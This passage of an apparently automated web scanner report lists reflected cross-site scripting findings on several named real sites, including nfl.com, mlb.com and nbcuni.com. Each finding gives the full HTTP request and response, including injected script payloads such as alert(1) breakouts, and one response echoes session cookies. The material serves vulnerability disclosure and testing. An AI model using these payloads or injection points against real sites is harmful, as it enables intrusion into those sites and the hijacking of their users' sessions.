Type%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822b7159%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822bba34%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822b608f%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Extern&cb=PluckSDK.jsonpcb('request_1')&u=1252827000 HTTP/1.1
Host: pluck.nfl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nfl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1317595812555%7C1320187812555%3B%20s_lastvisit%3D1317595812557%7C1412203812557%3B%20s_pv%3Dnfl%253Ahome%253Alanding%7C1317597612559%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447553851633AB-400001A160507934[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL03WSITENFL05proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 140
Cache-Control: private, max-age=10
Expires: Sun, 02 Oct 2011 22:51:10 GMT
Date: Sun, 02 Oct 2011 22:51:00 GMT
Connection: close
Vary: Accept-Encoding

PluckSDK.jsonpcb('request_1')({"chunkToken": "id6179<script>alert(1)</script>3fec9533353", "error": true, "message": "chunkToken invalid"});

2.150. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc97"><script>alert(1)</script>e5327a0f899 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.comcfc97"><script>alert(1)</script>e5327a0f899/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.comcfc97"><script>alert(1)</script>e5327a0f899/ac/83936167/Bottom3/default/empty.gif/4d686437616b364937616341434f6f54?x" target="_top">
...[SNIP]...

2.151. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce31f"><script>alert(1)</script>b8ff4cee58f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom3ce31f"><script>alert(1)</script>b8ff4cee58f HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/1814396463/Bottom3ce31f"><script>alert(1)</script>b8ff4cee58f/default/empty.gif/4d686437616b364937616341434f6f54?x" target="_top">
...[SNIP]...

2.152. http://rtb.media6degrees.com/adserv/FanBidHandler [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb.media6degrees.com
Path:   /adserv/FanBidHandler

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 53390<script>alert(1)</script>48d372daf91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/FanBidHandler?cb=1317598679840&callback=C1Os7Gk0Jd6Y.b3Zy7Os0Gk6J53390<script>alert(1)</script>48d372daf91&ref=http%3A%2F%2Fwww.myspace.com%2Feverything&adsize=300x250 HTTP/1.1
Host: rtb.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=87200027&pos=mrec&rnd=596331511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: orboptout=2-2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 69
Date: Sun, 02 Oct 2011 23:39:51 GMT

C1Os7Gk0Jd6Y.b3Zy7Os0Gk6J53390<script>alert(1)</script>48d372daf91={}

2.153. https://secure.mlb.com/style/nav_2011.jsp [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 302c8<script>alert(1)</script>c976b726125 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /style/nav_2011.jsp?c_id=mlb&section=account302c8<script>alert(1)</script>c976b726125 HTTP/1.1
Host: secure.mlb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://secure.mlb.com/enterworkflow.do?flowId=registration.forgottenpassword&c_id=mlb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3Dmlb%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:41:14 GMT
Expires: Mon, 03 Oct 2011 01:41:14 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3Dmlb%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 17473


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
FFF), color-stop(57%,#E5E5E5)); /* webkit */filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#FFFFFF', endColorstr='#E5E5E5',GradientType=0 ); /* ie */}

#value-menu li#header_account302c8<script>alert(1)</script>c976b726125 a, .dd_navigation li.first:hover, .dd_navigation li.first a:hover, .dd_navigation li.first.vmHover a, .dd_navigation li.first:hover a, .dd_navigation li.first a:focus, .dd_navigation a:active {color:#
...[SNIP]...

2.154. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e1b66<script>alert(1)</script>e3a516ef303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallbacke1b66<script>alert(1)</script>e3a516ef303 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 02 Oct 2011 23:03:21 GMT
Content-Length: 185
Content-Type: text/html

__nbcsnasadops.doSCallbacke1b66<script>alert(1)</script>e3a516ef303({ "cookie":{"JSESSIONID":"9FF1319B1415D041CE80699F6C4F0D4C","s_vi":"[CS]v1|2744766B851D082C-4000012DC00E683A[CE]"}});

2.155. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 989e6'%3balert(1)//5c41763d8fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 989e6';alert(1)//5c41763d8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?mm_pub=7348&989e6'%3balert(1)//5c41763d8fe=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=-1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:25 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=1WL79MteReyfxDfN8ii5gA--; expires=Sun, 02-Oct-2016 05:03:25 GMT; path=/; domain=.mmismm.com
Content-Length: 458
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?mm_pub=7348&989e6';alert(1)//5c41763d8fe=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'">
...[SNIP]...

2.156. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317595850600&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html

Issue detail

The value of the 1317595850600&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8defb"><script>alert(1)</script>51735ab64d1 was submitted in the 1317595850600&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317595850600&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=AAi1m2oJjEFFZ0Sh58VlbOb6obG1AbernmXNAtpQVXDF4GCQGl5hErNqe_8pD5a9P1QVhCsK8kJ5r31limQKOHP6q14G7pDR3iutUsTzDW9EebfNLdBJJY2S3UFiFqMELWn89HdjAlbIAYanaeCju6k6OGfXT2wlqMgPZ1YCiJ71d3c8Bo-EjdoQvB2vN3fQ7botY2RdRAMRH_LsXEfYBwbIMXev_XoYvK8QIExlD7IBFkDb1KOOH7vx2Ew10LTplTyQrWKNotE2osX96LT0LDozkZ9tT7oqshKyDK9UM1Qzhref=8defb"><script>alert(1)</script>51735ab64d1 HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=613392881
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396968603941; ts=9/14/2011+2:35:34+PM; z=4; sid=c849a43a-cfde-4f85-b6a4-c76881b88033; pxl=136:4B78BE|139:4B78BE|12E:4B78BE|270:4B78BE|12F:4B78BE|406:4B78BE|133:4B78BE|137:4B78BE|271:4B78BE|138:4B78BE|130:4B78BE|26F:4B78BE|C40:4B78BE|407:4B78BE|2A2:4B78BE|C36:4B78BE|135:4B78BE|131:4B78BE|134:4B78BE|132:4B78BE; px=136:00914110935|139:00914110935|12E:00914110935|270:00914110935|12F:00914110935|406:00914110935|133:00914110935|137:00914110935|271:00914110935|138:00914110935|130:00914110935|26F:00914110935|C40:00914110935|407:00914110935|2A2:00914110935|C36:00914110935|135:00914110935|131:00914110935|134:00914110935|132:00914110935; av1=32a4b.7bc32=0914110935; vcs0=v32A4B:7BC32_0_0_0_25BC5F_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 22:51:55 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=32a4b.7bc32=0914110935:51f37.7e2e3=1002111751; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v32A4B:7BC32_0_0_0_25BC5F_0_0|v51F37:7E2E3_0_0_0_26238F_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 22:51:54 GMT
Content-Length: 4628
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153045525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 22:56:55 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="t
...[SNIP]...
DW9EebfNLdBJJY2S3UFiFqMELWn89HdjAlbIAYanaeCju6k6OGfXT2wlqMgPZ1YCiJ71d3c8Bo-EjdoQvB2vN3fQ7botY2RdRAMRH_LsXEfYBwbIMXev_XoYvK8QIExlD7IBFkDb1KOOH7vx2Ew10LTplTyQrWKNotE2osX96LT0LDozkZ9tT7oqshKyDK9UM1Qzhref=8defb"><script>alert(1)</script>51735ab64d1http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/634983569/v/576462397214034506/ac/335671/b/279832/c/516835/clickTag/clickTag1/click.html" target="_blank">
...[SNIP]...

2.157. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317596177473&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html

Issue detail

The value of the 1317596177473&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f26d"><script>alert(1)</script>5b6aeb91de4 was submitted in the 1317596177473&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317596177473&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ACPBVOunxlx97t0OU1AlEPR02jiZL2g1BcznCzo7K91wIEChDy8HJBvV_mWuve1gp8W06zmo-ZZj7IQIXNsGokI187Za-QOPDDy3NPrR4KpmspA-UhamO8AJvXn4epAvEUJ_N8YD-aK_FmiXmi_Q_1qw_YUpgfa0fJ1mJNV9tYXqAgxI9_7uEawqXLlpco4-BF93ow1NX-m86BEb_u0k8mk10BzRYyweUowIc2nuzc6qA8GXC-4ba1BNHXWWGCr79dtroPjempAsp3q9TV3i_Ag8BnEzMsA-A_RxRZw7B-lshref=3f26d"><script>alert(1)</script>5b6aeb91de4 HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396968603941; pxl=136:4B78BE|139:4B78BE|12E:4B78BE|270:4B78BE|12F:4B78BE|406:4B78BE|133:4B78BE|137:4B78BE|271:4B78BE|138:4B78BE|130:4B78BE|26F:4B78BE|C40:4B78BE|407:4B78BE|2A2:4B78BE|C36:4B78BE|135:4B78BE|131:4B78BE|134:4B78BE|132:4B78BE; px=136:00914110935|139:00914110935|12E:00914110935|270:00914110935|12F:00914110935|406:00914110935|133:00914110935|137:00914110935|271:00914110935|138:00914110935|130:00914110935|26F:00914110935|C40:00914110935|407:00914110935|2A2:00914110935|C36:00914110935|135:00914110935|131:00914110935|134:00914110935|132:00914110935; ts=10/2/2011+10:50:51+PM; z=4; sid=372110b9-1463-4dcc-a9b9-2f922946f1e9; av1=32a4b.7bc32=0914110935:51f37.7e2e3=1002111750; vcs0=v32A4B:7BC32_0_0_0_25BC5F_0_0|v51F37:7E2E3_0_0_0_26238E_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:02:10 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111802; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239A_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:02:10 GMT
Content-Length: 4633
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:07:10 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="t
...[SNIP]...
4KpmspA-UhamO8AJvXn4epAvEUJ_N8YD-aK_FmiXmi_Q_1qw_YUpgfa0fJ1mJNV9tYXqAgxI9_7uEawqXLlpco4-BF93ow1NX-m86BEb_u0k8mk10BzRYyweUowIc2nuzc6qA8GXC-4ba1BNHXWWGCr79dtroPjempAsp3q9TV3i_Ag8BnEzMsA-A_RxRZw7B-lshref=3f26d"><script>alert(1)</script>5b6aeb91de4http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/1020241739/v/576462396953379735/ac/335671/b/279832/c/516835/clickTag/clickTag1/click.html" target="_blank">
...[SNIP]...

2.158. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317596233240&ASTPCT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html

Issue detail

The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cfbc"><script>alert(1)</script>64d9d73c90e was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90e HTTP/1.1
Host: this.content.served.by.adshuffle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:04:33 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:04:32 GMT
Content-Length: 4633
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:33 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="t
...[SNIP]...
dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90ehttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/1113356081/v/576462396953379735/ac/335671/b/279832/c/516835/clickTag/clickTag1/click.html" target="_blank">
...[SNIP]...

2.159. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc979"><script>alert(1)</script>139d12629a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317595850600&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=AAi1m2oJjEFFZ0Sh58VlbOb6obG1AbernmXNAtpQVXDF4GCQGl5hErNqe_8pD5a9P1QVhCsK8kJ5r31limQKOHP6q14G7pDR3iutUsTzDW9EebfNLdBJJY2S3UFiFqMELWn89HdjAlbIAYanaeCju6k6OGfXT2wlqMgPZ1YCiJ71d3c8Bo-EjdoQvB2vN3fQ7botY2RdRAMRH_LsXEfYBwbIMXev_XoYvK8QIExlD7IBFkDb1KOOH7vx2Ew10LTplTyQrWKNotE2osX96LT0LDozkZ9tT7oqshKyDK9UM1Qzhref=&fc979"><script>alert(1)</script>139d12629a4=1 HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=613392881
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
